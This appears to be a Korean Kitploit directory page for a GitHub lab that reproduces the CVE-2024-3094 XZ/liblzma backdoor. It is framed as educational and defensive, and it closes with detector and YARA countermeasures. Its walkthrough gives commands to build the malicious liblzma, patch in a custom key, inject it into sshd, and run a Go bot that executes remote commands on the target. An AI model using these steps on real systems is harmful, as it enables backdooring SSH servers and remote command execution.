Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2024-3094 — XZ 백도어 취약점에 대한 상세 설명 | Kitploit
도구/GitHubGitHub/valeriot30/cve-2024-3094
Vulnerability AnalysisExploitationMalware AnalysisBinary AnalysisLearning & EducationLabs & Practice
GitHubvaleriot30/cve-2024-3094

cve-2024-3094

XZ 백도어 취약점에 대한 상세 설명

저장소 보기
1131년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🛡️ 사이버보안 프로젝트: liblzma의 XZ 백도어 분석

📄 개요

이 프로젝트는 xz-utils (liblzma) 에서 발견된 주목할 만한 백도어를 분석하며, 5.6.0 및 5.6.1 버전에 영향을 미칩니다. 업스트림 빌드 시스템에 삽입된 악성 코드는 런타임 시 sshd가 LZMA 압축 라이브러리와 상호작용하는 방식을 수정하여 SSH 인증을 표적으로 삼았습니다.

⚠️ 이 프로젝트는 교육 및 방어 연구 목적으로만 사용됩니다.

취약 머신

이 저장소를 클론합니다

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

디렉터리로 이동합니다

root@kitploit:~
cd cve-2024-3094

Docker 컨테이너를 실행합니다

root@kitploit:~
docker build -t fedora-dev .
docker run --privileged -it --rm -p 2222:22 fedora-dev

악성 버전의 라이브러리를 가져옵니다

root@kitploit:~
cd ~  
git clone https://github.com/thesamesam/xz-archive.git  
cd xz-archive/5.6/ # The vulnerable version ( it works as well with 5.6.1 )  
tar xzf xz-5.6.0.tar.gz  
mv xz-5.6.0 ~

빌드 대상을 내보냅니다

root@kitploit:~
export RPM_ARCH=$(uname -m)

악성 라이브러리를 컴파일합니다

root@kitploit:~
cd ~
 cd ./xz-5.6.0/  
./configure
make -j 8

악성 SO 파일을 외부로 복사합니다:

root@kitploit:~
cp ./src/liblzma/.libs/liblzma.so.5.6.0 ~

컨테이너 내부에 저장소를 다시 클론합니다

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

사용자 지정 키로 liblzma 라이브러리를 패치합니다

root@kitploit:~
 python3 cve-2024-3094/patch.py liblzma.so.5.6.0

시스템에 악성 라이브러리를 링크합니다

root@kitploit:~
 sh cve-2024-3094/inject.sh

악성 라이브러리에 링크된 sshd를 실행합니다

root@kitploit:~
 env -i LANG=C /usr/sbin/sshd -D &

공격자 머신

이 저장소를 클론합니다

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

디렉터리로 이동합니다

root@kitploit:~
cd cve-2024-3094

GO 도구를 컴파일합니다

root@kitploit:~
go build

취약 머신의 IP 주소와 실행할 명령어를 입력하여 도구를 사용합니다

root@kitploit:~
./bot -addr 127.0.0.2:2222 -cmd 'sleep 60'

대응 조치

탐지기 사용

탐지기를 실행합니다

root@kitploit:~
sh detector.sh

Yara 사용

Yara 매칭 규칙을 사용합니다

root@kitploit:~
yara rule.yar ../liblzma.so.5.6.0 -s
도구 다운로드